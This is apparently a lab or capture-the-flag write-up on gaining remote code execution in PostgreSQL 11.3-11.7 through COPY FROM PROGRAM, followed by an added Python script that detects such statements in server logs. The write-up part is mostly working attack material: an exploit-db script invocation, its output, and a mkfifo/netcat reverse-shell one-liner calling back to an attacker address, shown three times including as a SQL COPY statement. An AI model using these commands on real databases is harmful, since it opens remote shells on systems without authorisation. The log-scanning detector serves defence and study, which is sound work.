Exploitation


Last updated 2 years ago

PostgreSQL DB 11.3 - 11.7

This version of PostgreSQL is vulnerable to RCE.

I was able to execute commands but I was never able to get a reverse shell until I read this article here.

python /usr/share/exploitdb/exploits/multiple/remote/50847.py -i 192.168.143.47 -p 5437 -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.49.143 80 >/tmp/f' 

[+] Connecting to PostgreSQL Database on 192.168.143.47:5437
[+] Connection to Database established
[+] Checking PostgreSQL version
[+] PostgreSQL 11.7 is likely vulnerable
[+] Creating table _2dd6b3f0887b2a35a68630f8de3d4c67

One-liner:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.49.143 80 >/tmp/f

This got me remote code execution as well as creating a table and getting a shell using the exact same method.

postgres=# COPY shell FROM PROGRAM 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.49.143 80 >/tmp/f';
COPY 0
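
A detection-side view of the statement above, as an added example that is not part of the original write-up: it scans PostgreSQL server log lines for `COPY ... FROM PROGRAM` and, going beyond the page, `COPY ... TO PROGRAM`, including statements logged across several lines. It assumes `log_statement` is enabled with a `log_line_prefix` of `'%m [%p] %u@%d '`; the function names and sample log lines are constructed for illustration.

```python
import re

# COPY <target> FROM|TO PROGRAM '<command>'; '' is an escaped quote in SQL.
COPY_PROGRAM = re.compile(
    r"\bCOPY\s+(?P<target>[^;]+?)\s+(?P<direction>FROM|TO)\s+PROGRAM\s+"
    r"E?'(?P<command>(?:[^']|'')*)'",
    re.IGNORECASE | re.DOTALL,
)
# Assumption: log_line_prefix = '%m [%p] %u@%d ' and log_statement is enabled.
ENTRY = re.compile(
    r"^(?P<ts>\S+ \S+ \S+) \[(?P<pid>\d+)\] (?P<user>[^@\s]+)@(?P<db>\S+) "
    r"LOG:\s+(?:statement|execute [^:]*): (?P<sql>.*)$",
    re.DOTALL,
)

SAMPLE_LOG = [  # constructed lines, not taken from a real server
    "2024-05-01 10:15:02.123 UTC [4121] app@shop LOG:  statement: COPY orders FROM '/var/lib/import/orders.csv';",
    "2024-05-01 10:16:40.551 UTC [4188] postgres@postgres LOG:  statement: CREATE TABLE cmd_out(line text);",
    "2024-05-01 10:16:41.007 UTC [4188] postgres@postgres LOG:  statement: copy cmd_out",
    "\tfrom program 'id';",  # PostgreSQL tab-indents continuation lines
    "2024-05-01 10:17:03.310 UTC [4188] postgres@postgres LOG:  statement: COPY (SELECT 1) TO PROGRAM 'echo ''hi''';",
]

def group_entries(lines):
    """Join tab-indented continuation lines onto the entry they continue."""
    entries = []
    for line in lines:
        if line.startswith("\t") and entries:
            entries[-1] += "\n" + line[1:]
        else:
            entries.append(line)
    return entries

def find_copy_program(lines):
    """Return one finding per COPY ... FROM/TO PROGRAM statement logged."""
    findings = []
    for entry in group_entries(lines):
        m = ENTRY.match(entry)
        for hit in COPY_PROGRAM.finditer(m["sql"] if m else ""):
            findings.append({
                "ts": m["ts"], "user": m["user"], "db": m["db"],
                "direction": hit["direction"].upper(), "target": hit["target"],
                "command": hit["command"].replace("''", "'"),
            })
    return findings

if __name__ == "__main__":
    print(*find_copy_program(SAMPLE_LOG), sep="\n")
```

The plain file import on the first sample line is not reported; only the statements that hand a command to the server's shell are.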

Command Execution with PostgreSQL Copy Command (Medium)
PostgreSQL 9.3-11.7 - Remote Code Execution (RCE) (Authenticated) (Exploit Database)